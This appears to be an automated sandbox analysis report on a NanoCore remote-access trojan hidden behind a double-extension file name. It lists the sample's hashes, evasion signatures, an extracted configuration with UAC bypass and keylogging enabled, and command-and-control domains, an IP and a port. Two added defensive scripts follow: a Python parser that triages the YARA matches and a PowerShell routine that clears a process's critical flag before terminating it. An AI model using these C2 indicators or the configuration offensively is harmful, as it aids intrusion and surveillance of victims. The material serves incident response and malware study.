Windows Analysis Report
004349256789197.pdf.scr.exe

Overview

General Information

Sample Name: 004349256789197.pdf.scr.exe
Analysis ID: 798041
MD5: 3ac05bbe35293fbfd0df49ecfb34c461
SHA1: ee12d93ac5f81036e920bb8c05638aa4e6c1f3bf
SHA256: 576263fb3c88934ebdb0aa6071f3a980710c9dfd2a3d63d09b0aa76f1caac9e7
Tags: exe

Detection

Nanocore
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: NanoCore
Detected Nanocore Rat
Yara detected AntiVM autoit script
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected Nanocore RAT
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Scheduled temp file as task from temp location
Multi AV Scanner detection for dropped file
Starts an encoded Visual Basic Script (VBE)
Creates multiple autostart registry keys
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign process
Creates autostart registry keys with suspicious values (likely registry only malware)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses dynamic DNS services
Writes to foreign memory regions
Protects its processes via BreakOnTermination flag
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
OS version to string mapping found (often used in BOTs)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query the security center for anti-virus and firewall products
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
AV process strings found (often used to terminate AV products)
Installs a raw input device (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
File is packed with WinRar
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Contains functionality to simulate mouse events
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Classification

AV Detection

Source: december2nd.ddns.net Avira URL Cloud: Label: malware
Source: december2n.duckdns.org Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Avira: detection malicious, Label: DR/AutoIt.Gen
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
Source: 004349256789197.pdf.scr.exe ReversingLabs: Detection: 44%
Source: 004349256789197.pdf.scr.exe Virustotal: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe ReversingLabs: Detection: 26%
Source: 22.2.RegSvcs.exe.720000.0.unpack Avira: Label: TR/Dropper.MSIL.Gen7
Source: 10.2.RegSvcs.exe.6210000.7.unpack Avira: Label: TR/NanoCore.fadte
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "d95e5ad5-6193-4689-a919-7befded6", "Group": "ITEego", "Domain1": "december2n.duckdns.org", "Domain2": "december2nd.ddns.net", "Port": 60705, "KeyboardLogging": "Enable", "RunOnStartup": "Enable", "RequestElevation": "Disable", "BypassUAC": "Enable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Enable", "SetCriticalProcess": "Enable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Enable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29996, "MutexTimeout": 4996, "LanTimeout": 2500, "WanTimeout": 8009, "BufferSize": "02000100", "MaxPacketSize": "", "GCThreshold": "", "BypassUserAccountControlData": "<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n <RegistrationInfo />\r\n <Triggers />\r\n <Principals>\r\n <Principal id=\"Author\">\r\n <LogonType>InteractiveToken</LogonType>\r\n <RunLevel>HighestAvailable</RunLevel>\r\n </Principal>\r\n </Principals>\r\n <Settings>\r\n <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n <AllowHardTerminate>true</AllowHardTerminate>\r\n <StartWhenAvailable>false</StartWhenAvailable>\r\n <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n <IdleSettings>\r\n <StopOnIdleEnd>false</StopOnIdleEnd>\r\n <RestartOnIdle>false</RestartOnIdle>\r\n </IdleSettings>\r\n <AllowStartOnDemand>true</AllowStartOnDemand>\r\n <Enabled>true</Enabled>\r\n <Hidden>false</Hidden>\r\n <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n <WakeToRun>false</WakeToRun>\r\n <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n <Priority>4</Priority>\r\n </Settings>\r\n <Actions Context=\"Author\">\r\n <Exec>\r\n <Command>\"#EXECUTABLEPATH\"</Command>\r\n <Arguments>$(Arg0)</Arguments>\r\n </Exec>\r\n </Actions>\r\n</Task"}
Source: 004349256789197.pdf.scr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 004349256789197.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003DA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError, 0_2_003DA69B
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW, 0_2_003EC220
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003FB348 FindFirstFileExA, 0_2_003FB348
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 6_2_00C0E387
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 6_2_00C0D836
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 6_2_00C1A0FA
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C1A488 FindFirstFileW,Sleep,FindNextFileW,FindClose, 6_2_00C1A488
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C165F1 FindFirstFileW,FindNextFileW,FindClose, 6_2_00C165F1
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BDC642 FindFirstFileExW, 6_2_00BDC642
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C172E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 6_2_00C172E9
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C17248 FindFirstFileW,FindClose, 6_2_00C17248

Networking

Source: unknown DNS query: name: december2n.duckdns.org
Source: unknown DNS query: name: december2nd.ddns.net
Source: Malware configuration extractor URLs: december2n.duckdns.org
Source: Malware configuration extractor URLs: december2nd.ddns.net
Source: Joe Sandbox View ASN Name: SPD-NETTR
Source: Joe Sandbox View IP Address: 212.193.30.230
Source: global traffic TCP traffic: 192.168.2.7:49714 -> 212.193.30.230:60705
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown DNS traffic detected: queries for: december2n.duckdns.org
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0A54A GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 6_2_00C0A54A
Source: RegSvcs.exe, 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: RegisterRawInputDevices

E-Banking Fraud

Source: Yara match File source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310180487.0000000001831000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.311013911.0000000004448000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481255588.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.467618128.0000000000F72000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.353086726.00000000018F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.351714814.000000000195E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.310685382.00000000017C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.481046485.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.408839619.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2756, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
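The match list above mixes three kinds of evidence that the report names in one flat style: unpacked PE images written as `<process index>.<stage>.<image>.<base>.<n>.[raw.]unpack`, raw memory dumps written as `<process index hex>.<stage hex>.<id>.<base>.<protection>...sdmp`, and whole-process string scans keyed by PID. The process index (17 ↔ 00000011, 22 ↔ 00000016, 10 ↔ 0000000A) is what ties a dump back to the image it came from, and the fifth dump field is the standard Windows page protection, so a 00000040 (PAGE_EXECUTE_READWRITE) dump inside the address range of an unpacked PE marks the injected payload. The following parser, an added example rather than anything from Joe Sandbox or this report, correlates those three forms. The sample lines are a constructed subset copied from this section; the field meanings for the three trailing hex fields of a `.sdmp` name are left unparsed because the report does not define them.

```python
import re
from collections import defaultdict

# Constructed sample: a subset of the "Source: Yara match" lines from this report.
SAMPLE_REPORT = """\
Source: Yara match File source: 22.2.RegSvcs.exe.3c3b041.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.3.ihgsvw.exe.1929698.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.RegSvcs.exe.720000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.374007081.0000000000722000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 3008, type: MEMORYSTR
"""

LINE_RE = re.compile(r"^Source: Yara match File source: (?P<src>.+?), type: (?P<kind>\w+)$")
# <proc index>.<stage>.<image>.<base hex>.<n>.[raw.]unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?\.exe)\.([0-9a-fA-F]+)\.(\d+)\.(raw\.)?unpack$")
# <proc index hex>.<stage hex>.<id>.<base hex>.<protect hex>.<three further hex fields>.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
PIDSTR_RE = re.compile(r"^Process Memory Space: (.+?) PID: (\d+)$")

# Standard Windows page-protection constants (winnt.h).
PAGE_EXECUTE_READWRITE = 0x40


def parse_source(line):
    """Return a dict describing one 'Source: Yara match' line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, kind = m.group("src"), m.group("kind")
    if kind == "UNPACKEDPE":
        u = UNPACK_RE.match(src)
        if not u:
            return None
        return {"kind": kind, "proc": int(u.group(1)), "stage": int(u.group(2)),
                "image": u.group(3), "base": int(u.group(4), 16),
                "raw": u.group(6) is not None}
    if kind == "MEMORY":
        d = SDMP_RE.match(src)
        if not d:
            return None
        return {"kind": kind, "proc": int(d.group(1), 16), "stage": int(d.group(2), 16),
                "base": int(d.group(4), 16), "protect": int(d.group(5), 16)}
    if kind == "MEMORYSTR":
        p = PIDSTR_RE.match(src)
        if not p:
            return None
        return {"kind": kind, "image": p.group(1), "pid": int(p.group(2))}
    return None


def correlate(report_text):
    """Group matches by sandbox process index; return (per-process dict, PIDs by image)."""
    procs = defaultdict(lambda: {"image": None, "unpacked": set(), "dumps": [], "rwx": []})
    pids = defaultdict(set)
    for line in report_text.splitlines():
        rec = parse_source(line)
        if rec is None:
            continue
        if rec["kind"] == "MEMORYSTR":
            pids[rec["image"]].add(rec["pid"])
            continue
        p = procs[rec["proc"]]
        if rec["kind"] == "UNPACKEDPE":
            p["image"] = rec["image"]          # the image name only appears in unpack entries
            p["unpacked"].add(rec["base"])
        else:
            p["dumps"].append((rec["base"], rec["protect"]))
            if rec["protect"] == PAGE_EXECUTE_READWRITE:
                p["rwx"].append(rec["base"])   # RWX private memory: injected-code candidate
    return dict(procs), dict(pids)


def summarize(report_text):
    """One triage line per process index, then one per image with string-scan PIDs."""
    procs, pids = correlate(report_text)
    out = []
    for idx in sorted(procs):
        p = procs[idx]
        out.append("proc %d (%s): %d unpacked PE(s), %d dump(s), RWX regions: %s" % (
            idx, p["image"] or "image unknown", len(p["unpacked"]), len(p["dumps"]),
            ", ".join(hex(b) for b in p["rwx"]) or "none"))
    for image in sorted(pids):
        out.append("%s PIDs with NanoCore strings: %s" % (image, sorted(pids[image])))
    return out


if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_REPORT)))
```

Run against the full list, the summary shows that the RWX dump at 0x722000 in process 22 (RegSvcs.exe, the .NET utility the sample hollows) sits just above the unpacked PE based at 0x720000 in the same process, which is the region to carve for the NanoCore configuration; the ihgsvw.exe entries are stage-3 dumps of the AutoIt dropper's copies, and the MEMORYSTR PIDs are the instances a responder should expect to find live.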

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process information set: 01 00 00 00 (ProcessBreakOnTermination set to 1: the process is marked critical, so terminating it triggers a CRITICAL_PROCESS_DIED bugcheck)
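The practical consequence of that flag is that a responder who simply runs Stop-Process or taskkill against the RegSvcs.exe host will blue-screen the machine and lose volatile evidence. The PowerShell below is an added example, not part of the Joe Sandbox report or the sample: it queries the flag through NtQueryInformationProcess (information class 0x1D, ProcessBreakOnTermination, a 4-byte value), clears it with NtSetInformationProcess under SeDebugPrivilege, and only then terminates. The `NtProc` class name and the three function names are this example's own; the NT APIs and the 0x1D class are real. It assumes an elevated session.

```powershell
# Added example, not from the Joe Sandbox report: check (and if needed clear) the
# ProcessBreakOnTermination flag before terminating a suspect process such as the
# RegSvcs.exe host seen in this analysis. Assumes an elevated PowerShell session.
$NtProcSource = @"
using System;
using System.Runtime.InteropServices;
public static class NtProc {
    // ProcessBreakOnTermination is information class 0x1D; the data is a 4-byte ULONG.
    public const int ProcessBreakOnTermination = 0x1D;
    [DllImport("ntdll.dll")]
    public static extern int NtQueryInformationProcess(IntPtr hProcess, int infoClass,
        out uint info, int infoLength, out int returnLength);
    [DllImport("ntdll.dll")]
    public static extern int NtSetInformationProcess(IntPtr hProcess, int infoClass,
        ref uint info, int infoLength);
}
"@
if (-not ("NtProc" -as [type])) { Add-Type -TypeDefinition $NtProcSource }

function Test-BreakOnTermination {
    # Returns $true when the process is marked critical (killing it bugchecks Windows).
    param([Parameter(Mandatory)][int]$Id)
    $proc = Get-Process -Id $Id -ErrorAction Stop
    [uint32]$flag = 0; [int]$returned = 0
    $status = [NtProc]::NtQueryInformationProcess($proc.Handle,
        [NtProc]::ProcessBreakOnTermination, [ref]$flag, 4, [ref]$returned)
    if ($status -ne 0) { throw ("NtQueryInformationProcess failed, NTSTATUS 0x{0:X8}" -f $status) }
    return [bool]$flag
}

function Clear-BreakOnTermination {
    # Clears the flag; needs SeDebugPrivilege, which EnterDebugMode enables for this session.
    param([Parameter(Mandatory)][int]$Id)
    [System.Diagnostics.Process]::EnterDebugMode()
    $proc = Get-Process -Id $Id -ErrorAction Stop
    [uint32]$flag = 0
    $status = [NtProc]::NtSetInformationProcess($proc.Handle,
        [NtProc]::ProcessBreakOnTermination, [ref]$flag, 4)
    if ($status -ne 0) { throw ("NtSetInformationProcess failed, NTSTATUS 0x{0:X8}" -f $status) }
}

function Stop-SuspectProcess {
    # Safe kill: clear the critical flag first, then terminate.
    param([Parameter(Mandatory)][int]$Id)
    if (Test-BreakOnTermination -Id $Id) {
        Write-Warning "PID $Id has BreakOnTermination set; clearing it before Stop-Process"
        Clear-BreakOnTermination -Id $Id
    }
    Stop-Process -Id $Id -Force
}

# Usage against the images this report names (every RegSvcs.exe and ihgsvw.exe instance):
# Get-Process -Name RegSvcs, ihgsvw -ErrorAction SilentlyContinue |
#     ForEach-Object { Stop-SuspectProcess -Id $_.Id }
```

Take a memory image of the process before clearing the flag if the C2 configuration is still needed; clearing it is a write to the process and is itself observable. Killing the host process is also not remediation on its own, since the dropper re-launches it through its scheduled task and autostart registry entries, which have to be removed in the same pass.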

System Summary

Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 29.3.ihgsvw.exe.133eea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
